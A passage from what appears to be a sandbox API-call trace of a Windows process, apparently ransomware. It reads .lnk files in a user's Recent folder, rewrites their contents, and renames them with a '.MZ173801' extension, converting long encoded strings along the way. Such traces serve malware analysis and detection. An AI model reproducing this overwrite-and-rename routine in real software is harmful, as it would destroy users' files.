lpLocalFileTime=0x19fa5c) returned 1 [0110.702] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qeFEt94 ZkESq80bTrZv.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qefet94 zkesq80btrzv.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0328e9, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9c0328e9, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9c0328e9, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x539)) returned 1 [0110.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.703] GetCurrentThreadId () returned 0x1358 [0110.703] GetCurrentThreadId () returned 0x1358 [0110.703] GetCurrentThreadId () returned 0x1358 [0110.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.704] GetCurrentThreadId () returned 0x1358 [0110.704] GetCurrentThreadId () returned 0x1358 [0110.704] GetCurrentThreadId () returned 0x1358 [0110.704] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qeFEt94 ZkESq80bTrZv.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qefet94 zkesq80btrzv.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.705] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.705] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.705] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x539 [0110.705] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.705] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x539, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x539, lpOverlapped=0x0) returned 1 [0110.706] CloseHandle (hObject=0x3f4) returned 1 [0110.706] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qeFEt94 ZkESq80bTrZv.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qefet94 zkesq80btrzv.ots.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.708] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x539, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x539, lpOverlapped=0x0) returned 1 [0110.709] CloseHandle (hObject=0x3f4) returned 1 [0110.710] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qeFEt94 ZkESq80bTrZv.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qefet94 zkesq80btrzv.ots.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qeFEt94 ZkESq80bTrZv.ots.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qefet94 zkesq80btrzv.ots.lnk.mz173801")) returned 1 [0110.711] GetCurrentThreadId () returned 0x1358 [0110.711] GetCurrentThreadId () returned 0x1358 [0110.711] GetCurrentThreadId () returned 0x1358 [0110.711] GetCurrentThreadId () returned 0x1358 [0110.711] GetCurrentThreadId () returned 0x1358 [0110.711] GetCurrentThreadId () returned 0x1358 [0110.711] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744ebc9f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x744ebc9f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x744ebc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x297, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qMCV4VrTY-vx5.lnk", cAlternateFileName="QMCV4V~1.LNK")) returned 1 [0110.711] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.711] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qMCV4VrTY-vx5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qmcv4vrty-vx5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744ebc9f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x744ebc9f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x744ebc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x297)) returned 1 [0110.712] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.712] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.712] GetCurrentThreadId () returned 0x1358 [0110.712] GetCurrentThreadId () returned 0x1358 [0110.712] GetCurrentThreadId () returned 0x1358 [0110.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.713] GetCurrentThreadId () returned 0x1358 [0110.713] GetCurrentThreadId () returned 0x1358 [0110.713] GetCurrentThreadId () returned 0x1358 [0110.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qMCV4VrTY-vx5.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\qmcv4vrty-vx5.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.713] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.713] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.714] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: 